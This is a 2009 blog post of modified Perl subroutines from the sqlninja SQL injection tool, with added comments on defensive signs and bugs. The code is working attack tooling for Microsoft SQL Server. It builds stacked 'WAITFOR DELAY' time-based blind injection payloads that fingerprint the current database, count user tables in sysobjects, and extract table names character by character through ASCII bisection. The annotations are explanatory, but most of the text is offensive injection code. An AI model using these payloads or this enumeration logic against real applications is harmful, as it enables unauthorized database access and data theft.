Monday, October 05, 2009

sqlninja mod

# fingerprint_db: assembles the time-based blind probes used to identify the
# current database.  Only the "are we in master?" query is built in the visible
# body, and nothing here sends it (no tryblind() call); $word1..$word3 and
# $len1/$len2 are prepared but not used below.  Every probe is a stacked
# `waitfor delay '0:0:$blindtime'` statement, so from the defender's side the
# tell-tale signs are WAITFOR DELAY appearing in application SQL and requests
# whose latency clusters at roughly $blindtime seconds.
# The "(diff)" after the sub name looks like a blog annotation marking the
# changed sub rather than a Perl prototype (those letters are not legal
# prototype characters).
sub fingerprint_db (diff)
{
# Fragments of a per-character probe on db_name(), joined as
#   $word1 . <pos> . $word2 . <n> . $word3
# i.e. "if ascii(substring((select db_name()),<pos>,1)) < <n> waitfor delay ...".
# $blindtime is a package-level variable defined elsewhere in the script.
my $word1 = "if ascii(substring((select db_name()),";
my $word2 = ",1)) < ";
my $word3 = " waitfor delay '0:0:".$blindtime."';";

# Fragments of a length probe: "if (select len(db_name())) < <n> waitfor delay ...".
my $len1 = "if (select len(db_name())) < ";
my $len2 = " waitfor delay '0:0:".$blindtime."';";

local $/=\1;    # input record separator = one byte (read input a byte at a time)
local $|=1;     # autoflush the selected output handle so progress text is not buffered

print "[+] Checking whether we are in master db...\n";
# Delays only when db_name() is 'master' ("if not(... <> 'master')").
# $query is not declared with `my` here, so it refers to a package global
# (it is declared lexically inside fingerprint_tables, which is a different variable).
$query = "if not(select db_name()) <> 'master' waitfor delay '0:0:"
.$blindtime."'";
}
#####################
# fingerprint_tables: time-based blind enumeration of user table/view names from
# sysobjects (xtype 'u'/'v').  Two probe shapes are used, both stacked
# `waitfor delay '0:0:$blindtime'` statements: one compares the object count with
# a rising integer, the other bisects the ASCII value of one character of one
# name.  Output is printed as it is discovered; the sub returns 1 from the
# "master db" branch and 0 otherwise.
# Depends on tryblind() and $blindtime, which are defined elsewhere in the script.
# tryblind() is assumed to send the query and return the observed delay in the
# same units as $blindtime (seconds) -- confirm against its definition.
# Defender's view: every probe contains WAITFOR DELAY and reads sysobjects, and
# the response times split between near-zero and ~$blindtime, so query logging,
# latency anomaly alerts and WAF rules on WAITFOR all see this traffic;
# parameterised queries remove the injection point itself.
sub fingerprint_tables
{
my $minlen = 0;     # declared but never read below
my $maxlen = 30;    # upper bound for the table-count loop
my $len = -1;       # overwritten with 30 below; caps both name length and table index
my $candidate;      # midpoint of the current ASCII bisection
my $query;
my $delay;          # value returned by tryblind(); compared against $blindtime - 2
my $number_of_tables2 = " waitfor delay '0:0:".$blindtime."';";

# Count probe, joined as $number_of_tables . <n> . $number_of_tables2:
# delays when the object count is below <n>.  The count is produced as a string
# by LTRIM(STR(...)) and compared with a number, presumably relying on SQL
# Server's implicit conversion.
my $number_of_tables = "if (SELECT LTRIM(STR(COUNT(name))) FROM sysobjects WHERE xtype IN ('u', 'v')) < "; # followed by <n> and $number_of_tables2

# Name probe, joined as $word1.<tb_num>.$word15.<charnum>.$word2.<candidate>.$word3:
# selects the <tb_num>-th name in ascending order (TOP 1 ... NOT IN (TOP <tb_num> ...)),
# takes character <charnum>, and delays when its ASCII value is below <candidate>.
my $word1 = "if ascii(substring(( SELECT TOP 1 name FROM sysobjects WHERE xtype IN ('u', 'v') AND name NOT IN (SELECT TOP "; # followed by <tb_num>
my $word15 = " name FROM sysobjects WHERE xtype IN ('u', 'v') ORDER BY name ASC) ORDER BY name ASC), ";
my $word2 = ",1)) < ";
my $word3 = " waitfor delay '0:0:".$blindtime."';";
my $size;           # table count found by the first loop; stays undef if no probe delayed before $maxlen
local $/=\1;        # input record separator = one byte
local $|=1;         # autoflush the selected output handle so each character appears as found

# Hard-coded values: with $delay = 0 the "master db" branch below is taken only
# when $blindtime < 2.  $len = 30 is reused both as the maximum name length and
# as the number of table indexes to walk (not the measured $size).
$delay = 0; $len = 30;
if ($delay > ($blindtime - 2)) {
print " We seem to be in the master db :)\n";
return 1;
} else {
print " Getting the number of tables\n";
print "[+] Finding tables length... \n";
my $number = 0; # candidate count, raised by one per probe
# Asks "count < $number?" for $number = 0, 1, 2, ...  A response slower than
# $blindtime - 2 means the comparison held, so the count is $number - 1.
# Setting $number to $maxlen ends the loop.  Cost: one request per table.
while ($number < $maxlen) {
$query = $number_of_tables.$number.$number_of_tables2;
$delay=tryblind($query);
if ($delay < $blindtime - 2) {
$number++;
} else {
$size = $number -1;
$number=$maxlen;
}
}

print " Got it ! There are ".$size." tables \n"; # $size is undef (warning) if the loop above never saw a delay
print "[+] Now going for the tablenames........\n";
my $asciinum = -1;  # -1 means "not yet resolved"; drives the bisection loop
my $charnum;        # 1-based character position within the current name
my $minchar;        # bisection lower bound (inclusive)
my $maxchar;        # bisection upper bound (exclusive)
my $tb_num;         # 0-based index of the name being read
my $no_of_tb;
# Walks indexes 0..$len (0..30) rather than 0..$size, so this loop does not
# use the count just measured.
$no_of_tb = $len;
for ($tb_num=0;$tb_num<=$no_of_tb;$tb_num++) {
print " Name of table ".$tb_num." is....: ";
# One bisection per character position; over 32..126 that is 7-8 requests.

for ($charnum=1; $charnum<=$len; $charnum++) {
$minchar=32;    # the search assumes 32 <= value < 126 (printable ASCII)
$maxchar=126;
while ($asciinum < 0 ) {
$candidate = int(($minchar+$maxchar)/2);
$query=$word1.$tb_num.$word15.$charnum.$word2.$candidate.$word3;
$delay=tryblind($query);
if (($maxchar-$minchar) > 1) {
# No delay => "value < candidate" was false => value >= candidate.
if ($delay < $blindtime - 2) {
$minchar=$candidate;
} else {
$maxchar=$candidate;
}
# With an integer midpoint the bounds never meet while the gap is > 1,
# so this assignment appears unreachable; kept as in the original.
if ($minchar==$maxchar) {
$asciinum=$minchar;
}
} else {
# Gap of exactly 1: $maxchar-1 == $minchar, so both branches resolve to
# $minchar and this final probe does not change the answer.
if ($delay < $blindtime - 2) {
$asciinum=$maxchar-1;
} else {
$asciinum=$minchar;
}
}
}
# 125 ('}') is the largest value the bisection can produce (126 is exclusive)
# and is treated as the end-of-name marker -- presumably because ascii() of a
# substring past the end of the name yields NULL, which never delays and so
# drives the search to its top.  Note this returns from the whole sub, so
# enumeration stops at the first name that ends this way.
if ($asciinum == 125) {
print "\n";
return 0;

}
printf("%c",$asciinum);
#print($asciinum);
$asciinum=-1;   # re-arm the bisection for the next character
}
print "\n";
} # end for $tb_num (the original comment said "end while")
return 0;
} # end else
} # end sub fingerprint_tables
